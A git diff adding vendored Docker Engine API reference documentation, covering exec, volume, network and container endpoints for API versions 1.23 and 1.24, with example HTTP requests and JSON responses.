+    POST /v1.23/exec/e90e34656806/start HTTP/1.1
+    Content-Type: application/json
+
+    {
+     "Detach": false,
+     "Tty": false
+    }
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/vnd.docker.raw-stream
+
+    {% raw %}
+    {{ STREAM }}
+    {% endraw %}
+
+**JSON parameters**:
+
+-   **Detach** - Detach from the `exec` command.
+-   **Tty** - Boolean value to allocate a pseudo-TTY.
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such exec instance
+-   **409** - container is paused
+
+**Stream details**:
+
+Similar to the stream behavior of `POST /containers/(id or name)/attach` API
+
+#### Exec Resize
+
+`POST /exec/(id)/resize`
+
+Resizes the `tty` session used by the `exec` command `id`.  The unit is number of characters.
+This API is valid only if `tty` was specified as part of creating and starting the `exec` command.
+
+**Example request**:
+
+    POST /v1.23/exec/e90e34656806/resize?h=40&w=80 HTTP/1.1
+    Content-Type: text/plain
+
+**Example response**:
+
+    HTTP/1.1 201 Created
+    Content-Type: text/plain
+
+**Query parameters**:
+
+-   **h** – height of `tty` session
+-   **w** – width
+
+**Status codes**:
+
+-   **201** – no error
+-   **404** – no such exec instance
+
+#### Exec Inspect
+
+`GET /exec/(id)/json`
+
+Return low-level information about the `exec` command `id`.
+
+**Example request**:
+
+    GET /v1.23/exec/11fb006128e8ceb3942e7c58d77750f24210e35f879dd204ac975c184b820b39/json HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {
+      "CanRemove": false,
+      "ContainerID": "b53ee82b53a40c7dca428523e34f741f3abc51d9f297a14ff874bf761b995126",
+      "DetachKeys": "",
+      "ExitCode": 2,
+      "ID": "f33bbfb39f5b142420f4759b2348913bd4a8d1a6d7fd56499cb41a1bb91d7b3b",
+      "OpenStderr": true,
+      "OpenStdin": true,
+      "OpenStdout": true,
+      "ProcessConfig": {
+        "arguments": [
+          "-c",
+          "exit 2"
+        ],
+        "entrypoint": "sh",
+        "privileged": false,
+        "tty": true,
+        "user": "1000"
+      },
+      "Running": false
+    }
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such exec instance
+-   **500** - server error
+
+### 2.4 Volumes
+
+#### List volumes
+
+`GET /volumes`
+
+**Example request**:
+
+    GET /v1.23/volumes HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {
+      "Volumes": [
+        {
+          "Name": "tardis",
+          "Driver": "local",
+          "Mountpoint": "/var/lib/docker/volumes/tardis"
+        }
+      ],
+      "Warnings": []
+    }
+
+**Query parameters**:
+
+- **filters** - JSON encoded value of the filters (a `map[string][]string`) to process on the volumes list. There is one available filter: `dangling=true`
+
+**Status codes**:
+
+-   **200** - no error
+-   **500** - server error
+
+#### Create a volume
+
+`POST /volumes/create`
+
+Create a volume
+
+**Example request**:
+
+    POST /v1.23/volumes/create HTTP/1.1
+    Content-Type: application/json
+
+    {
+      "Name": "tardis",
+      "Labels": {
+        "com.example.some-label": "some-value",
+        "com.example.some-other-label": "some-other-value"
+      }
+    }
+
+**Example response**:
+
+    HTTP/1.1 201 Created
+    Content-Type: application/json
+
+    {
+      "Name": "tardis",
+      "Driver": "local",
+      "Mountpoint": "/var/lib/docker/volumes/tardis",
+      "Labels": {
+        "com.example.some-label": "some-value",
+        "com.example.some-other-label": "some-other-value"
+      }
+    }
+
+**Status codes**:
+
+- **201** - no error
+- **500**  - server error
+
+**JSON parameters**:
+
+- **Name** - The new volume's name. If not specified, Docker generates a name.
+- **Driver** - Name of the volume driver to use. Defaults to `local` for the name.
+- **DriverOpts** - A mapping of driver options and values. These options are
+    passed directly to the driver and are driver specific.
+- **Labels** - Labels to set on the volume, specified as a map: `{"key":"value","key2":"value2"}`
+
+#### Inspect a volume
+
+`GET /volumes/(name)`
+
+Return low-level information on the volume `name`
+
+**Example request**:
+
+    GET /v1.23/volumes/tardis
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {
+      "Name": "tardis",
+      "Driver": "local",
+      "Mountpoint": "/var/lib/docker/volumes/tardis/_data",
+      "Labels": {
+          "com.example.some-label": "some-value",
+          "com.example.some-other-label": "some-other-value"
+      }
+    }
+
+**Status codes**:
+
+-   **200** - no error
+-   **404** - no such volume
+-   **500** - server error
+
+#### Remove a volume
+
+`DELETE /volumes/(name)`
+
+Instruct the driver to remove the volume (`name`).
+
+**Example request**:
+
+    DELETE /v1.23/volumes/tardis HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 204 No Content
+
+**Status codes**:
+
+-   **204** - no error
+-   **404** - no such volume or volume driver
+-   **409** - volume is in use and cannot be removed
+-   **500** - server error
+
+### 3.5 Networks
+
+#### List networks
+
+`GET /networks`
+
+**Example request**:
+
+    GET /v1.23/networks?filters={"type":{"custom":true}} HTTP/1.1
+
+**Example response**:
+
+```
+HTTP/1.1 200 OK
+Content-Type: application/json
+
+[
+  {
+    "Name": "bridge",
+    "Id": "f2de39df4171b0dc801e8002d1d999b77256983dfc63041c0f34030aa3977566",
+    "Scope": "local",
+    "Driver": "bridge",
+    "EnableIPv6": false,
+    "Internal": false,
+    "IPAM": {
+      "Driver": "default",
+      "Config": [
+        {
+          "Subnet": "172.17.0.0/16"
+        }
+      ]
+    },
+    "Containers": {
+      "39b69226f9d79f5634485fb236a23b2fe4e96a0a94128390a7fbbcc167065867": {
+        "EndpointID": "ed2419a97c1d9954d05b46e462e7002ea552f216e9b136b80a7db8d98b442eda",
+        "MacAddress": "02:42:ac:11:00:02",
+        "IPv4Address": "172.17.0.2/16",
+        "IPv6Address": ""
+      }
+    },
+    "Options": {
+      "com.docker.network.bridge.default_bridge": "true",
+      "com.docker.network.bridge.enable_icc": "true",
+      "com.docker.network.bridge.enable_ip_masquerade": "true",
+      "com.docker.network.bridge.host_binding_ipv4": "0.0.0.0",
+      "com.docker.network.bridge.name": "docker0",
+      "com.docker.network.driver.mtu": "1500"
+    }
+  },
+  {
+    "Name": "none",
+    "Id": "e086a3893b05ab69242d3c44e49483a3bbbd3a26b46baa8f61ab797c1088d794",
+    "Scope": "local",
+    "Driver": "null",
+    "EnableIPv6": false,
+    "Internal": false,
+    "IPAM": {
+      "Driver": "default",
+      "Config": []
+    },
+    "Containers": {},
+    "Options": {}
+  },
+  {
+    "Name": "host",
+    "Id": "13e871235c677f196c4e1ecebb9dc733b9b2d2ab589e30c539efeda84a24215e",
+    "Scope": "local",
+    "Driver": "host",
+    "EnableIPv6": false,
+    "Internal": false,
+    "IPAM": {
+      "Driver": "default",
+      "Config": []
+    },
+    "Containers": {},
+    "Options": {}
+  }
+]
+```
+
+**Query parameters**:
+
+- **filters** - JSON encoded network list filter. The filter value is one of:
+  -   `id=<network-id>` Matches all or part of a network id.
+  -   `name=<network-name>` Matches all or part of a network name.
+  -   `type=["custom"|"builtin"]` Filters networks by type. The `custom` keyword returns all user-defined networks.
+
+**Status codes**:
+
+-   **200** - no error
+-   **500** - server error
+
+#### Inspect network
+
+`GET /networks/<network-id>`
+
+**Example request**:
+
+    GET /v1.23/networks/7d86d31b1478e7cca9ebed7e73aa0fdeec46c5ca29497431d3007d2d9e15ed99 HTTP/1.1
+
+**Example response**:
+
+```
+HTTP/1.1 200 OK
+Content-Type: application/json
+
+{
+  "Name": "net01",
+  "Id": "7d86d31b1478e7cca9ebed7e73aa0fdeec46c5ca29497431d3007d2d9e15ed99",
+  "Scope": "local",
+  "Driver": "bridge",
+  "EnableIPv6": false,
+  "IPAM": {
+    "Driver": "default",
+    "Config": [
+      {
+        "Subnet": "172.19.0.0/16",
+        "Gateway": "172.19.0.1/16"
+      }
+    ],
+    "Options": {
+        "foo": "bar"
+    }
+  },
+  "Internal": false,
+  "Containers": {
+    "19a4d5d687db25203351ed79d478946f861258f018fe384f229f2efa4b23513c": {
+      "Name": "test",
+      "EndpointID": "628cadb8bcb92de107b2a1e516cbffe463e321f548feb37697cce00ad694f21a",
+      "MacAddress": "02:42:ac:13:00:02",
+      "IPv4Address": "172.19.0.2/16",
+      "IPv6Address": ""
+    }
+  },
+  "Options": {
+    "com.docker.network.bridge.default_bridge": "true",
+    "com.docker.network.bridge.enable_icc": "true",
+    "com.docker.network.bridge.enable_ip_masquerade": "true",
+    "com.docker.network.bridge.host_binding_ipv4": "0.0.0.0",
+    "com.docker.network.bridge.name": "docker0",
+    "com.docker.network.driver.mtu": "1500"
+  },
+  "Labels": {
+    "com.example.some-label": "some-value",
+    "com.example.some-other-label": "some-other-value"
+  }
+}
+```
+
+**Status codes**:
+
+-   **200** - no error
+-   **404** - network not found
+
+#### Create a network
+
+`POST /networks/create`
+
+Create a network
+
+**Example request**:
+
+```
+POST /v1.23/networks/create HTTP/1.1
+Content-Type: application/json
+
+{
+  "Name":"isolated_nw",
+  "CheckDuplicate":true,
+  "Driver":"bridge",
+  "EnableIPv6": true,
+  "IPAM":{
+    "Driver": "default",
+    "Config":[
+      {
+        "Subnet":"172.20.0.0/16",
+        "IPRange":"172.20.10.0/24",
+        "Gateway":"172.20.10.11"
+      },
+      {
+        "Subnet":"2001:db8:abcd::/64",
+        "Gateway":"2001:db8:abcd::1011"
+      }
+    ],
+    "Options": {
+      "foo": "bar"
+    }
+  },
+  "Internal":true,
+  "Options": {
+    "com.docker.network.bridge.default_bridge": "true",
+    "com.docker.network.bridge.enable_icc": "true",
+    "com.docker.network.bridge.enable_ip_masquerade": "true",
+    "com.docker.network.bridge.host_binding_ipv4": "0.0.0.0",
+    "com.docker.network.bridge.name": "docker0",
+    "com.docker.network.driver.mtu": "1500"
+  },
+  "Labels": {
+    "com.example.some-label": "some-value",
+    "com.example.some-other-label": "some-other-value"
+  }
+}
+```
+
+**Example response**:
+
+```
+HTTP/1.1 201 Created
+Content-Type: application/json
+
+{
+  "Id": "22be93d5babb089c5aab8dbc369042fad48ff791584ca2da2100db837a1c7c30",
+  "Warning": ""
+}
+```
+
+**Status codes**:
+
+- **201** - no error
+- **404** - plugin not found
+- **500** - server error
+
+**JSON parameters**:
+
+- **Name** - The new network's name. this is a mandatory field
+- **CheckDuplicate** - Requests daemon to check for networks with same name. Defaults to `false`
+- **Driver** - Name of the network driver plugin to use. Defaults to `bridge` driver
+- **Internal** - Restrict external access to the network
+- **IPAM** - Optional custom IP scheme for the network
+  - **Driver** - Name of the IPAM driver to use. Defaults to `default` driver
+  - **Config** - List of IPAM configuration options, specified as a map:
+      `{"Subnet": <CIDR>, "IPRange": <CIDR>, "Gateway": <IP address>, "AuxAddress": <device_name:IP address>}`
+  - **Options** - Driver-specific options, specified as a map: `{"option":"value" [,"option2":"value2"]}`
+- **EnableIPv6** - Enable IPv6 on the network
+- **Options** - Network specific options to be used by the drivers
+- **Labels** - Labels to set on the network, specified as a map: `{"key":"value" [,"key2":"value2"]}`
+
+#### Connect a container to a network
+
+`POST /networks/(id)/connect`
+
+Connect a container to a network
+
+**Example request**:
+
+```
+POST /v1.23/networks/22be93d5babb089c5aab8dbc369042fad48ff791584ca2da2100db837a1c7c30/connect HTTP/1.1
+Content-Type: application/json
+
+{
+  "Container":"3613f73ba0e4",
+  "EndpointConfig": {
+    "IPAMConfig": {
+        "IPv4Address":"172.24.56.89",
+        "IPv6Address":"2001:db8::5689"
+    }
+  }
+}
+```
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+
+**Status codes**:
+
+- **200** - no error
+- **404** - network or container is not found
+- **500** - Internal Server Error
+
+**JSON parameters**:
+
+- **container** - container-id/name to be connected to the network
+
+#### Disconnect a container from a network
+
+`POST /networks/(id)/disconnect`
+
+Disconnect a container from a network
+
+**Example request**:
+
+```
+POST /v1.23/networks/22be93d5babb089c5aab8dbc369042fad48ff791584ca2da2100db837a1c7c30/disconnect HTTP/1.1
+Content-Type: application/json
+
+{
+  "Container":"3613f73ba0e4",
+  "Force":false
+}
+```
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+
+**Status codes**:
+
+- **200** - no error
+- **404** - network or container not found
+- **500** - Internal Server Error
+
+**JSON parameters**:
+
+- **Container** - container-id/name to be disconnected from a network
+- **Force** - Force the container to disconnect from a network
+
+#### Remove a network
+
+`DELETE /networks/(id)`
+
+Instruct the driver to remove the network (`id`).
+
+**Example request**:
+
+    DELETE /v1.23/networks/22be93d5babb089c5aab8dbc369042fad48ff791584ca2da2100db837a1c7c30 HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 204 No Content
+
+**Status codes**:
+
+-   **204** - no error
+-   **404** - no such network
+-   **500** - server error
+
+## 3. Going further
+
+### 3.1 Inside `docker run`
+
+As an example, the `docker run` command line makes the following API calls:
+
+- Create the container
+
+- If the status code is 404, it means the image doesn't exist:
+    - Try to pull it.
+    - Then, retry to create the container.
+
+- Start the container.
+
+- If you are not in detached mode:
+- Attach to the container, using `logs=1` (to have `stdout` and
+      `stderr` from the container's start) and `stream=1`
+
+- If in detached mode or only `stdin` is attached, display the container's id.
+
+### 3.2 Hijacking
+
+In this version of the API, `/attach`, uses hijacking to transport `stdin`,
+`stdout`, and `stderr` on the same socket.
+
+To hint potential proxies about connection hijacking, Docker client sends
+connection upgrade headers similarly to websocket.
+
+    Upgrade: tcp
+    Connection: Upgrade
+
+When Docker daemon detects the `Upgrade` header, it switches its status code
+from **200 OK** to **101 UPGRADED** and resends the same headers.
+
+
+### 3.3 CORS Requests
+
+To set cross origin requests to the Engine API please give values to
+`--api-cors-header` when running Docker in daemon mode. Set * (asterisk) allows all,
+default or blank means CORS disabled
+
+    $ dockerd -H="192.168.1.9:2375" --api-cors-header="http://foo.bar"
diff --git a/vendor/github.com/docker/docker/docs/api/v1.24.md b/vendor/github.com/docker/docker/docs/api/v1.24.md
new file mode 100644
index 0000000000..0cf4e2afab
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/api/v1.24.md
@@ -0,0 +1,5316 @@
+---
+title: "Engine API v1.24"
+description: "API Documentation for Docker"
+keywords: "API, Docker, rcli, REST, documentation"
+redirect_from:
+- /engine/reference/api/docker_remote_api_v1.24/
+- /reference/api/docker_remote_api_v1.24/
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+## 1. Brief introduction
+
+ - The daemon listens on `unix:///var/run/docker.sock` but you can
+   [Bind Docker to another host/port or a Unix socket](../reference/commandline/dockerd.md#bind-docker-to-another-host-port-or-a-unix-socket).
+ - The API tends to be REST. However, for some complex commands, like `attach`
+   or `pull`, the HTTP connection is hijacked to transport `stdout`,
+   `stdin` and `stderr`.
+
+## 2. Errors
+
+The Engine API uses standard HTTP status codes to indicate the success or failure of the API call. The body of the response will be JSON in the following format:
+
+    {
+        "message": "page not found"
+    }
+
+The status codes that are returned for each endpoint are specified in the endpoint documentation below.
+
+## 3. Endpoints
+
+### 3.1 Containers
+
+#### List containers
+
+`GET /containers/json`
+
+List containers
+
+**Example request**:
+
+    GET /v1.24/containers/json?all=1&before=8dfafdbc3a40&size=1 HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    [
+         {
+                 "Id": "8dfafdbc3a40",
+                 "Names":["/boring_feynman"],
+                 "Image": "ubuntu:latest",
+                 "ImageID": "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82",
+                 "Command": "echo 1",
+                 "Created": 1367854155,
+                 "State": "Exited",
+                 "Status": "Exit 0",
+                 "Ports": [{"PrivatePort": 2222, "PublicPort": 3333, "Type": "tcp"}],
+                 "Labels": {
+                         "com.example.vendor": "Acme",
+                         "com.example.license": "GPL",
+                         "com.example.version": "1.0"
+                 },
+                 "SizeRw": 12288,
+                 "SizeRootFs": 0,
+                 "HostConfig": {
+                         "NetworkMode": "default"
+                 },
+                 "NetworkSettings": {
+                         "Networks": {
+                                 "bridge": {
+                                          "IPAMConfig": null,
+                                          "Links": null,
+                                          "Aliases": null,
+                                          "NetworkID": "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812",
+                                          "EndpointID": "2cdc4edb1ded3631c81f57966563e5c8525b81121bb3706a9a9a3ae102711f3f",
+                                          "Gateway": "172.17.0.1",
+                                          "IPAddress": "172.17.0.2",
+                                          "IPPrefixLen": 16,
+                                          "IPv6Gateway": "",
+                                          "GlobalIPv6Address": "",
+                                          "GlobalIPv6PrefixLen": 0,
+                                          "MacAddress": "02:42:ac:11:00:02"
+                                  }
+                         }
+                 },
+                 "Mounts": [
+                         {
+                                  "Name": "fac362...80535",
+                                  "Source": "/data",
+                                  "Destination": "/data",
+                                  "Driver": "local",
+                                  "Mode": "ro,Z",
+                                  "RW": false,
+                                  "Propagation": ""
+                         }
+                 ]
+         },
+         {
+                 "Id": "9cd87474be90",
+                 "Names":["/coolName"],
+                 "Image": "ubuntu:latest",
+                 "ImageID": "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82",
+                 "Command": "echo 222222",
+                 "Created": 1367854155,
+                 "State": "Exited",
+                 "Status": "Exit 0",
+                 "Ports": [],
+                 "Labels": {},
+                 "SizeRw": 12288,
+                 "SizeRootFs": 0,
+                 "HostConfig": {
+                         "NetworkMode": "default"
+                 },
+                 "NetworkSettings": {
+                         "Networks": {
+                                 "bridge": {
+                                          "IPAMConfig": null,
+                                          "Links": null,
+                                          "Aliases": null,
+                                          "NetworkID": "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812",
+                                          "EndpointID": "88eaed7b37b38c2a3f0c4bc796494fdf51b270c2d22656412a2ca5d559a64d7a",
+                                          "Gateway": "172.17.0.1",
+                                          "IPAddress": "172.17.0.8",
+                                          "IPPrefixLen": 16,
+                                          "IPv6Gateway": "",
+                                          "GlobalIPv6Address": "",
+                                          "GlobalIPv6PrefixLen": 0,
+                                          "MacAddress": "02:42:ac:11:00:08"
+                                  }
+                         }
+                 },
+                 "Mounts": []
+         },
+         {
+                 "Id": "3176a2479c92",
+                 "Names":["/sleepy_dog"],
+                 "Image": "ubuntu:latest",
+                 "ImageID": "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82",
+                 "Command": "echo 3333333333333333",
+                 "Created": 1367854154,
+                 "State": "Exited",
+                 "Status": "Exit 0",
+                 "Ports":[],
+                 "Labels": {},
+                 "SizeRw":12288,
+                 "SizeRootFs":0,
+                 "HostConfig": {
+                         "NetworkMode": "default"
+                 },
+                 "NetworkSettings": {
+                         "Networks": {
+                                 "bridge": {
+                                          "IPAMConfig": null,
+                                          "Links": null,
+                                          "Aliases": null,
+                                          "NetworkID": "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812",
+                                          "EndpointID": "8b27c041c30326d59cd6e6f510d4f8d1d570a228466f956edf7815508f78e30d",
+                                          "Gateway": "172.17.0.1",
+                                          "IPAddress": "172.17.0.6",
+                                          "IPPrefixLen": 16,
+                                          "IPv6Gateway": "",
+                                          "GlobalIPv6Address": "",
+                                          "GlobalIPv6PrefixLen": 0,
+                                          "MacAddress": "02:42:ac:11:00:06"
+                                  }
+                         }
+                 },
+                 "Mounts": []
+         },
+         {
+                 "Id": "4cb07b47f9fb",
+                 "Names":["/running_cat"],
+                 "Image": "ubuntu:latest",
+                 "ImageID": "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82",
+                 "Command": "echo 444444444444444444444444444444444",
+                 "Created": 1367854152,
+                 "State": "Exited",
+                 "Status": "Exit 0",
+                 "Ports": [],
+                 "Labels": {},
+                 "SizeRw": 12288,
+                 "SizeRootFs": 0,
+                 "HostConfig": {
+                         "NetworkMode": "default"
+                 },
+                 "NetworkSettings": {
+                         "Networks": {
+                                 "bridge": {
+                                          "IPAMConfig": null,
+                                          "Links": null,
+                                          "Aliases": null,
+                                          "NetworkID": "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812",
+                                          "EndpointID": "d91c7b2f0644403d7ef3095985ea0e2370325cd2332ff3a3225c4247328e66e9",
+                                          "Gateway": "172.17.0.1",
+                                          "IPAddress": "172.17.0.5",
+                                          "IPPrefixLen": 16,
+                                          "IPv6Gateway": "",
+                                          "GlobalIPv6Address": "",
+                                          "GlobalIPv6PrefixLen": 0,
+                                          "MacAddress": "02:42:ac:11:00:05"
+                                  }
+                         }
+                 },
+                 "Mounts": []
+         }
+    ]
+
+**Query parameters**:
+
+-   **all** – 1/True/true or 0/False/false, Show all containers.
+        Only running containers are shown by default (i.e., this defaults to false)
+-   **limit** – Show `limit` last created
+        containers, include non-running ones.
+-   **since** – Show only containers created since Id, include
+        non-running ones.
+-   **before** – Show only containers created before Id, include
+        non-running ones.
+-   **size** – 1/True/true or 0/False/false, Show the containers
+        sizes
+-   **filters** - a JSON encoded value of the filters (a `map[string][]string`) to process on the containers list. Available filters:
+  -   `exited=<int>`; -- containers with exit code of  `<int>` ;
+  -   `status=`(`created`|`restarting`|`running`|`paused`|`exited`|`dead`)
+  -   `label=key` or `label="key=value"` of a container label
+  -   `isolation=`(`default`|`process`|`hyperv`)   (Windows daemon only)
+  -   `ancestor`=(`<image-name>[:<tag>]`,  `<image id>` or `<image@digest>`)
+  -   `before`=(`<container id>` or `<container name>`)
+  -   `since`=(`<container id>` or `<container name>`)
+  -   `volume`=(`<volume name>` or `<mount point destination>`)
+  -   `network`=(`<network id>` or `<network name>`)
+
+**Status codes**:
+
+-   **200** – no error
+-   **400** – bad parameter
+-   **500** – server error
+
+#### Create a container
+
+`POST /containers/create`
+
+Create a container
+
+**Example request**:
+
+    POST /v1.24/containers/create HTTP/1.1
+    Content-Type: application/json
+
+    {
+           "Hostname": "",
+           "Domainname": "",
+           "User": "",
+           "AttachStdin": false,
+           "AttachStdout": true,
+           "AttachStderr": true,
+           "Tty": false,
+           "OpenStdin": false,
+           "StdinOnce": false,
+           "Env": [
+                   "FOO=bar",
+                   "BAZ=quux"
+           ],
+           "Cmd": [
+                   "date"
+           ],
+           "Entrypoint": "",
+           "Image": "ubuntu",
+           "Labels": {
+                   "com.example.vendor": "Acme",
+                   "com.example.license": "GPL",
+                   "com.example.version": "1.0"
+           },
+           "Volumes": {
+             "/volumes/data": {}
+           },
+           "WorkingDir": "",
+           "NetworkDisabled": false,
+           "MacAddress": "12:34:56:78:9a:bc",
+           "ExposedPorts": {
+                   "22/tcp": {}
+           },
+           "StopSignal": "SIGTERM",
+           "HostConfig": {
+             "Binds": ["/tmp:/tmp"],
+             "Tmpfs": { "/run": "rw,noexec,nosuid,size=65536k" },
+             "Links": ["redis3:redis"],
+             "Memory": 0,
+             "MemorySwap": 0,
+             "MemoryReservation": 0,
+             "KernelMemory": 0,
+             "CpuPercent": 80,
+             "CpuShares": 512,
+             "CpuPeriod": 100000,
+             "CpuQuota": 50000,
+             "CpusetCpus": "0,1",
+             "CpusetMems": "0,1",
+             "IOMaximumBandwidth": 0,
+             "IOMaximumIOps": 0,
+             "BlkioWeight": 300,
+             "BlkioWeightDevice": [{}],
+             "BlkioDeviceReadBps": [{}],
+             "BlkioDeviceReadIOps": [{}],
+             "BlkioDeviceWriteBps": [{}],
+             "BlkioDeviceWriteIOps": [{}],
+             "MemorySwappiness": 60,
+             "OomKillDisable": false,
+             "OomScoreAdj": 500,
+             "PidMode": "",
+             "PidsLimit": -1,
+             "PortBindings": { "22/tcp": [{ "HostPort": "11022" }] },
+             "PublishAllPorts": false,
+             "Privileged": false,
+             "ReadonlyRootfs": false,
+             "Dns": ["8.8.8.8"],
+             "DnsOptions": [""],
+             "DnsSearch": [""],
+             "ExtraHosts": null,
+             "VolumesFrom": ["parent", "other:ro"],
+             "CapAdd": ["NET_ADMIN"],
+             "CapDrop": ["MKNOD"],
+             "GroupAdd": ["newgroup"],
+             "RestartPolicy": { "Name": "", "MaximumRetryCount": 0 },
+             "NetworkMode": "bridge",
+             "Devices": [],
+             "Sysctls": { "net.ipv4.ip_forward": "1" },
+             "Ulimits": [{}],
+             "LogConfig": { "Type": "json-file", "Config": {} },
+             "SecurityOpt": [],
+             "StorageOpt": {},
+             "CgroupParent": "",
+             "VolumeDriver": "",
+             "ShmSize": 67108864
+          },
+          "NetworkingConfig": {
+              "EndpointsConfig": {
+                  "isolated_nw" : {
+                      "IPAMConfig": {
+                          "IPv4Address":"172.20.30.33",
+                          "IPv6Address":"2001:db8:abcd::3033",
+                          "LinkLocalIPs":["169.254.34.68", "fe80::3468"]
+                      },
+                      "Links":["container_1", "container_2"],
+                      "Aliases":["server_x", "server_y"]
+                  }
+              }
+          }
+      }
+
+**Example response**:
+
+      HTTP/1.1 201 Created
+      Content-Type: application/json
+
+      {
+           "Id":"e90e34656806",
+           "Warnings":[]
+      }
+
+**JSON parameters**:
+
+-   **Hostname** - A string value containing the hostname to use for the
+      container. This must be a valid RFC 1123 hostname.
+-   **Domainname** - A string value containing the domain name to use
+      for the container.
+-   **User** - A string value specifying the user inside the container.
+-   **AttachStdin** - Boolean value, attaches to `stdin`.
+-   **AttachStdout** - Boolean value, attaches to `stdout`.
+-   **AttachStderr** - Boolean value, attaches to `stderr`.
+-   **Tty** - Boolean value, Attach standard streams to a `tty`, including `stdin` if it is not closed.
+-   **OpenStdin** - Boolean value, opens `stdin`,
+-   **StdinOnce** - Boolean value, close `stdin` after the 1 attached client disconnects.
+-   **Env** - A list of environment variables in the form of `["VAR=value", ...]`
+-   **Labels** - Adds a map of labels to a container. To specify a map: `{"key":"value", ... }`
+-   **Cmd** - Command to run specified as a string or an array of strings.
+-   **Entrypoint** - Set the entry point for the container as a string or an array
+      of strings.
+-   **Image** - A string specifying the image name to use for the container.
+-   **Volumes** - An object mapping mount point paths (strings) inside the
+      container to empty objects.
+-   **WorkingDir** - A string specifying the working directory for commands to
+      run in.
+-   **NetworkDisabled** - Boolean value, when true disables networking for the
+      container
+-   **ExposedPorts** - An object mapping ports to an empty object in the form of:
+      `"ExposedPorts": { "<port>/<tcp|udp>: {}" }`
+-   **StopSignal** - Signal to stop a container as a string or unsigned integer. `SIGTERM` by default.
+-   **HostConfig**
+    -   **Binds** – A list of volume bindings for this container. Each volume binding is a string in one of these forms:
+           + `host-src:container-dest` to bind-mount a host path into the
+             container. Both `host-src`, and `container-dest` must be an
+             _absolute_ path.
+           + `host-src:container-dest:ro` to make the bind-mount read-only
+             inside the container. Both `host-src`, and `container-dest` must be
+             an _absolute_ path.
+           + `volume-name:container-dest` to bind-mount a volume managed by a
+             volume driver into the container. `container-dest` must be an
+             _absolute_ path.
+           + `volume-name:container-dest:ro` to mount the volume read-only
+             inside the container.  `container-dest` must be an _absolute_ path.
+    -   **Tmpfs** – A map of container directories which should be replaced by tmpfs mounts, and their corresponding
+          mount options. A JSON object in the form `{ "/run": "rw,noexec,nosuid,size=65536k" }`.
+    -   **Links** - A list of links for the container. Each link entry should be
+          in the form of `container_name:alias`.
+    -   **Memory** - Memory limit in bytes.
+    -   **MemorySwap** - Total memory limit (memory + swap); set `-1` to enable unlimited swap.
+          You must use this with `memory` and make the swap value larger than `memory`.
+    -   **MemoryReservation** - Memory soft limit in bytes.
+    -   **KernelMemory** - Kernel memory limit in bytes.
+    -   **CpuPercent** - An integer value containing the usable percentage of the available CPUs. (Windows daemon only)
+    -   **CpuShares** - An integer value containing the container's CPU Shares
+          (ie. the relative weight vs other containers).
+    -   **CpuPeriod** - The length of a CPU period in microseconds.
+    -   **CpuQuota** - Microseconds of CPU time that the container can get in a CPU period.
+    -   **CpusetCpus** - String value containing the `cgroups CpusetCpus` to use.
+    -   **CpusetMems** - Memory nodes (MEMs) in which to allow execution (0-3, 0,1). Only effective on NUMA systems.
+    -   **IOMaximumBandwidth** - Maximum IO absolute rate in terms of IOps.
+    -   **IOMaximumIOps** - Maximum IO absolute rate in terms of bytes per second.
+    -   **BlkioWeight** - Block IO weight (relative weight) accepts a weight value between 10 and 1000.
+    -   **BlkioWeightDevice** - Block IO weight (relative device weight) in the form of:        `"BlkioWeightDevice": [{"Path": "device_path", "Weight": weight}]`
+    -   **BlkioDeviceReadBps** - Limit read rate (bytes per second) from a device in the form of:	`"BlkioDeviceReadBps": [{"Path": "device_path", "Rate": rate}]`, for example:
+        `"BlkioDeviceReadBps": [{"Path": "/dev/sda", "Rate": "1024"}]"`
+    -   **BlkioDeviceWriteBps** - Limit write rate (bytes per second) to a device in the form of:	`"BlkioDeviceWriteBps": [{"Path": "device_path", "Rate": rate}]`, for example:
+        `"BlkioDeviceWriteBps": [{"Path": "/dev/sda", "Rate": "1024"}]"`
+    -   **BlkioDeviceReadIOps** - Limit read rate (IO per second) from a device in the form of:	`"BlkioDeviceReadIOps": [{"Path": "device_path", "Rate": rate}]`, for example:
+        `"BlkioDeviceReadIOps": [{"Path": "/dev/sda", "Rate": "1000"}]`
+    -   **BlkioDeviceWiiteIOps** - Limit write rate (IO per second) to a device in the form of:	`"BlkioDeviceWriteIOps": [{"Path": "device_path", "Rate": rate}]`, for example:
+        `"BlkioDeviceWriteIOps": [{"Path": "/dev/sda", "Rate": "1000"}]`
+    -   **MemorySwappiness** - Tune a container's memory swappiness behavior. Accepts an integer between 0 and 100.
+    -   **OomKillDisable** - Boolean value, whether to disable OOM Killer for the container or not.
+    -   **OomScoreAdj** - An integer value containing the score given to the container in order to tune OOM killer preferences.
+    -   **PidMode** - Set the PID (Process) Namespace mode for the container;
+          `"container:<name|id>"`: joins another container's PID namespace
+          `"host"`: use the host's PID namespace inside the container
+    -   **PidsLimit** - Tune a container's pids limit. Set -1 for unlimited.
